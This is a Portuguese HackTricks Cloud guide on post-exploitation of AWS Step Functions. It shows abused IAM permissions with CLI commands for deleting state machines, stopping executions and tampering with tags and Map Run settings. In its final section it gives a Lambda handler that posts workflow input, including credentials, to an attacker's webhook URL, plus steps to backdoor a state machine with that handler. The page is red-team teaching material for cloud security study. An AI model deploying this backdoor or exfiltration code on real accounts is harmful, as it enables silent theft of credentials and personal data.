AWS - Step Functions Pós-Exploração

Reading time: 7 minutes

tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Confira os planos de assinatura!
Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.

Step Functions

Para mais informações sobre este serviço da AWS, consulte:

AWS - Step Functions Enum

`states:RevealSecrets`

Essa permissão permite revelar dados secretos dentro de uma execução. Para isso, é necessário definir Inspection level como TRACE e o parâmetro revealSecrets como true.

`states:DeleteStateMachine`, `states:DeleteStateMachineVersion`, `states:DeleteStateMachineAlias`

Um atacante com essas permissões poderia excluir permanentemente state machines, suas versões e aliases. Isso pode interromper fluxos de trabalho críticos, resultar em perda de dados e exigir um tempo significativo para recuperar e restaurar as state machines afetadas. Além disso, permitiria que um atacante encobrisse os rastros usados, interrompesse investigações forenses e potencialmente prejudicasse operações ao remover processos essenciais de automação e configurações de estado.

note

Ao deletar uma state machine, você também exclui todas as suas versões e aliases associados.
Ao deletar um alias de state machine, você não exclui as versões da state machine que fazem referência a esse alias.
Não é possível deletar uma versão de state machine que esteja atualmente referenciada por um ou mais aliases.

bash

# Delete state machine
aws stepfunctions delete-state-machine --state-machine-arn <value>
# Delete state machine version
aws stepfunctions delete-state-machine-version --state-machine-version-arn <value>
# Delete state machine alias
aws stepfunctions delete-state-machine-alias --state-machine-alias-arn <value>

Impacto Potencial: Interrupção de workflows críticos, perda de dados e tempo de inatividade operacional.

`states:UpdateMapRun`

Um atacante com essa permissão poderia manipular a configuração de falha do Map Run e a configuração de paralelismo, podendo aumentar ou diminuir o número máximo de execuções de workflows filhos permitidas, afetando diretamente o desempenho do serviço. Além disso, um atacante poderia adulterar a porcentagem e a contagem de falhas toleradas, podendo reduzir esse valor para 0, de modo que sempre que um item falhar, todo o Map Run falharia, afetando diretamente a execução da state machine e potencialmente interrompendo workflows críticos.

bash

aws stepfunctions update-map-run --map-run-arn <value> [--max-concurrency <value>] [--tolerated-failure-percentage <value>] [--tolerated-failure-count <value>]

Impacto Potencial: Degradação de desempenho e interrupção de fluxos de trabalho críticos.

`states:StopExecution`

Um atacante com essa permissão poderia interromper a execução de qualquer state machine, atrapalhando fluxos de trabalho e processos em andamento. Isso pode resultar em transações incompletas, operações de negócio paralisadas e possível corrupção de dados.

warning

Esta ação não é suportada por express state machines.

bash

aws stepfunctions stop-execution --execution-arn <value> [--error <value>] [--cause <value>]

Impacto Potencial: Interrupção de fluxos de trabalho em andamento, tempo de inatividade operacional e potencial corrupção de dados.

`states:TagResource`, `states:UntagResource`

Um atacante poderia adicionar, modificar ou remover tags de recursos do Step Functions, prejudicando a alocação de custos da sua organização, o rastreamento de recursos e as políticas de controle de acesso baseadas em tags.

bash

aws stepfunctions tag-resource --resource-arn <value> --tags Key=<key>,Value=<value>
aws stepfunctions untag-resource --resource-arn <value> --tag-keys <key>

Impacto Potencial: Disrupção na alocação de custos, rastreamento de recursos e políticas de controle de acesso baseadas em tags.

`states:UpdateStateMachine`, `lambda:UpdateFunctionCode`

Um atacante que compromete um usuário ou role com as seguintes permissões:

json

{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "AllowUpdateStateMachine",
"Effect": "Allow",
"Action": "states:UpdateStateMachine",
"Resource": "*"
},
{
"Sid": "AllowUpdateFunctionCode",
"Effect": "Allow",
"Action": "lambda:UpdateFunctionCode",
"Resource": "*"
}
]
}

...pode conduzir um high-impact and stealthy post-exploitation attack combinando Lambda backdooring com manipulação da lógica do Step Function.

Este cenário assume que a vítima usa AWS Step Functions para orquestrar fluxos de trabalho que processam entradas sensíveis, como credenciais, tokens ou PII.

Exemplo de invocação da vítima:

bash

aws stepfunctions start-execution \
--state-machine-arn arn:aws:states:us-east-1:<victim-account-id>:stateMachine:LegitStateMachine \
--input '{"email": "victim@example.com", "password": "hunter2"}' --profile victim

Se a Step Function estiver configurada para invocar uma Lambda como LegitBusinessLogic, o atacante pode prosseguir com duas variantes de ataque furtivas:

Atualizou a função Lambda

O atacante modifica o código da função Lambda já usada pela Step Function (LegitBusinessLogic) para exfiltrate silenciosamente os dados de entrada.

python

# send_to_attacker.py
import requests

def lambda_handler(event, context):
requests.post("https://webhook.site/<attacker-id>/exfil", json=event)
return {"status": "exfiltrated"}

bash

zip function.zip send_to_attacker.py

aws lambda update-function-code \
--function-name LegitBusinessLogic \
--zip-file fileb://function.zip -profile attacker

Adicionar um estado malicioso ao Step Function

Alternativamente, o atacante pode injetar um exfiltration state no início do fluxo de trabalho atualizando a definição do Step Function.

malicious_state_definition.json

{
"Comment": "Backdoored for Exfiltration",
"StartAt": "OriginalState",
"States": {
"OriginalState": {
"Type": "Task",
"Resource": "arn:aws:lambda:us-east-1:<victim-id>:function:LegitBusinessLogic",
"End": true
}
}
}

bash

aws stepfunctions update-state-machine \
--state-machine-arn arn:aws:states:us-east-1:<victim-id>:stateMachine:LegitStateMachine \
--definition file://malicious_state_definition.json --profile attacker

O atacante pode ser ainda mais furtivo ao atualizar a definição de estado para algo como isto { "Comment": "Backdoored for Exfiltration", "StartAt": "ExfiltrateSecrets", "States": { "ExfiltrateSecrets": { "Type": "Task", "Resource": "arn:aws:lambda:us-east-1:victim-id:function:SendToAttacker", "InputPath": "$", "ResultPath": "$.exfil", "Next": "OriginalState" }, "OriginalState": { "Type": "Task", "Resource": "arn:aws:lambda:us-east-1:victim-id:function:LegitBusinessLogic", "End": true } } } onde a vítima não perceberá a diferença

Configuração da Vítima (Contexto para Exploit)

A Step Function (LegitStateMachine) é usada para processar entrada sensível do usuário.
Chama uma ou mais funções Lambda, como LegitBusinessLogic.

Impacto Potencial:

Exfiltration silenciosa de dados sensíveis, incluindo secrets, credentials, API keys e PII.
Sem erros visíveis ou falhas na execução do fluxo de trabalho.
Difícil de detectar sem auditar o código Lambda ou os traços de execução.
Permite persistência a longo prazo se o backdoor permanecer no código ou na lógica ASL.

tip

Support HackTricks

Confira os planos de assinatura!
Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.

HackTricks Cloud